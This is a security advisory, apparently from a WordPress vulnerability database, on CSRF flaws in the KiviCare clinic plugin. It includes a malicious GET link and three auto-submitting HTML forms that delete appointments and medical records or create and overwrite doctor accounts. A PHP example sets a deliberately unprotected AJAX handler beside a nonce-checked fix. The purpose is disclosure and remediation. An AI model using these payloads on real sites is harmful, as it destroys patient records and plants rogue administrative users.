WPEX-ID: E0741E2C-C529-4815-8744-16E01CDB0AED
Published: Jun 05, 2023

KiviCare Management System < 3.2.1 - Multiple CSRF

Source: wpvulndb
Tags: csrf, admin actions, appointment deletion, medical record deletion, doctor creation, doctor edit

EPSS: 0.002 (percentile 52.4%)

The plugin's AJAX actions lack effective CSRF protection (the nonce checks are either flawed or missing entirely), so an attacker can make a logged-in user, including an administrator, perform unwanted actions simply by getting them to open an attacker-controlled page. This includes, but is not limited to, deleting arbitrary appointments and medical records and creating or updating users such as patients and doctors.

Make a logged-in admin open the following URL (a plain GET request, so any link they follow is enough) to delete the appointment with ID 1: https://example.com/wp-admin/admin-ajax.php?action=ajax_get&route_name=appointment_delete&id=1

Make a logged-in admin open a page containing the HTML code below.

To make them delete the medical record with ID 1:

<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin-ajax.php?action=ajax_post" method="POST">
        <input type="text" name="route_name" value="medical_records_delete"/>
        <input type="text" name="id" value="1">
        <input type="submit" value="submit">
    </form>
</body>

To make them create a new doctor:

<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin-ajax.php?action=ajax_post" method="POST">
        <input type="text" name="user_email" value="[email protected]">
        <input type="text" name="first_name" value="Attacker">
        <input type="text" name="last_name" value="Via CSRF">
        <input type="text" name="mobile_number" value="1">
        <input type="text" name="gender" value="other">
        <input type="submit" value="submit">
    </form>
</body>

To edit an existing doctor instead, add the doctor's ID and their current (correct) email address to the form above, e.g.:
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin-ajax.php?action=ajax_post" method="POST">
        <input type="text" name="ID" value="8">
        <input type="text" name="user_email" value="[email protected]">
        <input type="text" name="first_name" value="Attacker">
        <input type="text" name="last_name" value="Via CSRF">
        <input type="text" name="mobile_number" value="1">
        <input type="text" name="gender" value="other">
        <input type="submit" value="submit">
    </form>
</body>

(This also overwrites the doctor's name, mobile number and gender, and resets their specialisation and other profile fields.)
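The root cause the advisory describes is a dispatcher behind admin-ajax.php that acts on route_name without first verifying a nonce tied to the user's session. The plugin's own source is not reproduced on this page, so the snippet below is an added illustration and not KiviCare's code: a hypothetical handler of that shape (the table name demo_medical_records, the nonce action 'demo_ajax', the script handle 'demo-ajax' and the ajax_post_secure action are all assumed), followed by the hardened form a fix would take using WordPress's check_ajax_referer() and current_user_can().

```php
<?php
// Added illustration, not KiviCare's code. It assumes a hypothetical table
// demo_medical_records, nonce action 'demo_ajax' and script handle 'demo-ajax';
// only the admin-ajax.php + route_name shape is taken from the advisory.

function demo_delete_medical_record( int $id ): int {
    global $wpdb;
    // Returns the number of rows removed (0 if the ID did not exist).
    return (int) $wpdb->delete( $wpdb->prefix . 'demo_medical_records', [ 'id' => $id ], [ '%d' ] );
}

// --- Vulnerable shape: dispatch on route_name with no nonce or capability check.
// Any page a logged-in user visits can auto-submit a form to this action and the
// browser attaches the WordPress auth cookies, which is exactly the PoC above.
add_action( 'wp_ajax_ajax_post', function () {
    $route = isset( $_POST['route_name'] ) ? sanitize_key( $_POST['route_name'] ) : '';
    $id    = isset( $_POST['id'] ) ? absint( $_POST['id'] ) : 0;

    if ( 'medical_records_delete' === $route ) {
        wp_send_json_success( [ 'deleted' => demo_delete_medical_record( $id ) ] );
    }
    wp_send_json_error( 'unknown route', 400 );
} );

// --- Hardened shape: the nonce check runs before any parameter is acted on.
add_action( 'wp_ajax_ajax_post_secure', function () {
    // Dies with "-1" and HTTP 403 unless _ajax_nonce is a valid nonce for the
    // action 'demo_ajax', the current user and the current session.
    check_ajax_referer( 'demo_ajax', '_ajax_nonce' );

    // CSRF protection is not authorization: a valid nonce only proves the request
    // came from a page this user loaded, so the capability check is still needed.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    $route = isset( $_POST['route_name'] ) ? sanitize_key( $_POST['route_name'] ) : '';
    $id    = isset( $_POST['id'] ) ? absint( $_POST['id'] ) : 0;

    if ( 'medical_records_delete' === $route && $id > 0 ) {
        wp_send_json_success( [ 'deleted' => demo_delete_medical_record( $id ) ] );
    }
    wp_send_json_error( 'unknown route', 400 );
} );

// The nonce has to reach the plugin's own JavaScript. An attacker's page cannot
// read it, because it is embedded in an admin page that cannot be loaded
// cross-origin. demo.js (assumed) then posts
// { action: 'ajax_post_secure', route_name: ..., id: ..., _ajax_nonce: demoAjax.nonce }.
add_action( 'admin_enqueue_scripts', function () {
    wp_enqueue_script( 'demo-ajax', plugins_url( 'demo.js', __FILE__ ), [ 'jquery' ], '1.0', true );
    wp_localize_script( 'demo-ajax', 'demoAjax', [
        'url'   => admin_url( 'admin-ajax.php' ),
        'nonce' => wp_create_nonce( 'demo_ajax' ),
    ] );
} );
```

Two caveats follow from the hardened form. The nonce alone does not make the route safe: a low-privileged account holds a valid nonce of its own, so without the capability check it could still delete other users' records through the same route. And state-changing routes should not be reachable via GET at all, as the appointment_delete link above is, because a bare link or image tag on any site is enough to trigger them with the victim's cookies.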

